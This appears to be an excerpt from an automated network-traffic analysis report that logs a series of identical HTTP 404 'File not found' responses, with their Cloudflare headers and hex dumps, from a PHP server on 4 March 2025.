Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CeuERjBMWoDP%2Bb7RLghZ8t3rD7x7MufvKDlMcgJ1sz3xIwxgu8hezZUpKEWtl5GtKaTQbs6tPw8PfWouDE2%2BAstawVZOebezqiQlA7T0O91jISIvTugUS9MUu50%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec3a55e03c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1448&rtt_var=724&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1L08imI2A7RP4d0Fi0ILng0Cr3m2tBbCdqAxdB8doJzkt4fZHlaWrkS4G3pWxqUSz195o1oVCNVvZVhEOcYwOCZ4qJPane3IPUgj7anYDPG%2F3l4UvaaAPsAVH0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec3b14bdadc28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VG5WlqYq%2FY2CMMBiKNF2yo3Xb5guk8SjOK%2FsH%2B0fSP1beRJD%2BBnY%2F3ggJ8fYoeHlNwoT%2BQQYVMw5dhyhCr0GI2XPDFO759yqMTQWRhhEJ6k%2BJU0Ezncx%2BfOy2rg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec3bd6af5c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsHWMJIsav9PTadM%2FdlmVbeHewBI1KNGLwCA9tWvrjVgu3T%2FomNMGxaTcLgfGS6qHsgOidc4B7m%2BqtPooLAPLq1U2KAKG2uWGtOFl9rnLzNRyRg7eC3pVCyhtxY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec3d54f48727b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1999&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FG4nVb67OrgIqm7p%2BB4Pr20bWycv9L0tgXGYzO0eWxqnS6dI3rd3LDGnEPhms0O4Pvm%2FUcDI8M4LdP%2B0Xvwo5rzXBRmu2xRf700DVS7O%2BUrOdcKvTYBwQec7osw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec3ed5b3c43b3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1537&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xTkZZkvujac3Zdd3iLUMevdfY9blqrlIzhltnw1uFpwaeBTE8Oi%2B2chOjaAikf%2FqL08krL0WUMLXOj9DMhtN%2Bz0ltTm1iep%2B08OnV9Kb3t0YKSCFUfqvqvI6cTk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec410ca8ec34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1459&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRzrL9%2BoiceMhKP8MmmkEt6fm7X3MiPldNMeZFoboL7x%2Btm5iUm2R7oYR3BAnKCiGLO0srYll9K21WLEePqcwJUxqF4WhTCm4xnCtx9dC0WaSPVVSe5XzM0r%2BZg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec427b886c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1448&min_rtt=1448&rtt_var=724&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jIiVAa1iTjo5sNJft%2Fa97WWBtpicOl5vgy9%2BUUIrpmMJRlY2bteD2a1bc3FhXQV%2BmzI4hmO%2Fs6o4lLERIRED62roeaxehsxcUBDF3pXu0MeqZZ0MIEDGKDjwivA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec43f1b00424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1628&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quJ4snLrjsmZAKtntjO0Cr4DoFrs8ZHQ2sDd8vpAuQivm1T8QII2UhWSJsO7Gf%2BmOIPf0btIyuDPpFB1VKaYZp6ZaFV1Fi1yf0dp2m0u80RLWPWIywwOS0D3L2Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec44c9a6b0f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=74994&min_rtt=74994&rtt_var=37497&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:52:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2Bx7r%2Fj38fYCPlyhBsGWPwjrV2hkGLHC6Ah5Ch7YVGHvvBiGf%2B9xQGhbRWPOi0PSO7d%2FaNhC0gx8fqkvNiv0EvLxmS0AyatTIkhv47PNskJJ%2BIyxrb%2FqRokdZXY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec46529b8c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1531&min_rtt=1531&rtt_var=765&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSvfts93UFtakN2EUyI%2FLSrlQnnmYACWMErBLAmzeE2pRIsUFElEI2U8soIz6w95mJ6XGxeFyBkwJe3h5BAbhlsmTljNfW0ncq6B666Ie%2FeeJKjtQpedvxbDPOM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec47118f3c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1493&rtt_var=746&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9oWiJdiyqfgQqWdE2W9hhjccQp04sQaMELhcMg0%2BXWZ36m8sKaNZkIgcqWw0tyL45yb%2BJy6ksYcT7gp84HtgIaPplwk%2FWX8LhcbuwoCqVG3cLM40kxtzGFaWPtg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec47d1adc729f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2023&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BdCdDFSYpPoQyg3VTClH8bKNAtKkuuOGax6MYWoa2pI38hLj50kxDgvE74xzdZlwvr2tOYF2NXtpISg28HC8qoprWbt6JfbDxhPY%2Fd8CN2e3SOlCJKqyj7VT9E4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec489c88adc28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1613&rtt_var=806&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SS2DrY0jBWhUmpDJ1yrAeq9Q3CjEWZzfJNWrKjoMXzOlBDylwZNxUedJpeS2A1SAxrpFqvM%2FKFxdotJzmtKv6hJg3MxpfvkG5wePqtWdP0gwU9UdHXiMEdj7TNM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec495d811c34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1473&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXRe7AOsP1Jtlkcdoqncnj40egdPl%2Ff3XofNBWnQlbNNtEhXut0aMIr1fvs2BO7CsAkpPikYvg2kSf%2BmHPGXI0B1jIfrHq8YwGGJDc14AbNVjhG9nLgHanvisfs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec4addb57424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WSdoGYt%2B0ABrkXXTmlQ3sDK7qXcDXjgmN7N%2BCv%2BlMhfTjkglFqcdgfniOU8ROoKE0njbyE4at8eUUmFzGX66rzq4wu6%2BUd%2FEblsp70Vz1IHaOqbp22VwsoWQuDo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec4b9fcd4dc28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1637&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdOSxuUe9%2FGopTlQHMjDBuRpLIcOwcPhjGpunZiLvi9BWSUBF%2FjpRnhaQDfMAaXIkC35%2FXRpEqesjOV8gtYi6F10P4Sk1nufxqZcBSV4egS%2BvZlDUJlb9VNFL3s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec4c60feac34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1442&rtt_var=721&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R5r41qwn5H5v4T7eoK%2BiMMfYOhyeanlt1%2FKuy8TCn%2FcpjKn4N%2FxU4ngjPF7Pf%2Br0fu3ft8JJqqMIfv%2FOxsLFJO0Yoqcg1r8vuPUqURQ9lwI8vC3B7xmHxeTm2%2F8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec4d23d71862e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2026&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLBszkHRjvf9nuzorYt6HDfW6AltwDmHJwkVz9uIcZUl1yTfI95FCrqzEGX%2Fdf06vXqiCG84pRxDwmouic7KgPoXm%2FkkoTQ2%2BlDg8sgAh0jZikWtCkOvL4nvsbM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec4e9fe2e424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1vLofHD5Is45zEHkaPFyzYjUzOzGBuL8zmabFmA3c6%2FZxY1uzue4LCOeA5b9hD57K8PtKW21gZUsgIVXQLkxkjCdbdg6UgQpMxFVfrYCqzXTW4F0BGdv6TW%2BWg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5021d4adc28-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3v24Ys7m3agg8k4eqNMpVPMC0PM4twICbq4%2FlazHLlsiKf9tQb3bosVFfme9TLwIQjxtqPJnIP7G1NATgucW9SmTwgaoujzZ3wZpI5aub1vFNjP5us6%2BkZZhvVo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec50e0a7a0f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=13997&min_rtt=13997&rtt_var=6998&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D5AIqs0691FTCJVLZbv4LO5sZtcR2MOrFdGRmJorZ4R5svUlCbGtS8S4j7qvo3SkUKf%2FrwazydtoMDlPv4kp79xewIRr51Z57ENB897tU56RRJKo%2Bj9dc2uHers%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec519cfe8424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6Ch%2BvK3nN8SW8Th5M4V%2FIkYxXh8IrqKvglzTc1%2BsEfaKNuq2y4SzJ13JxYyJfCbiAYRgRK0k7BVJejW5%2FqznBTkRx7c5wffxfp7OrwNIkhyqMNV7D6R0TD9oSo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec5264e4ec34f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1469&rtt_var=734&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 Mar 2025 04:53:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iWvWxKQJPFd1kP6uK%2FcsvoNDJ0R1VZXS2WWy3HuRnXQCeKKLtRSwoIXGUu3mbw810wrdTnH4VSMXwudpmTB1E%2BJYAQHmJBm1qZFNOeFD5G0Bb5fK7e4QfQ2UP60%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91aec53d29b2424b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1547&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
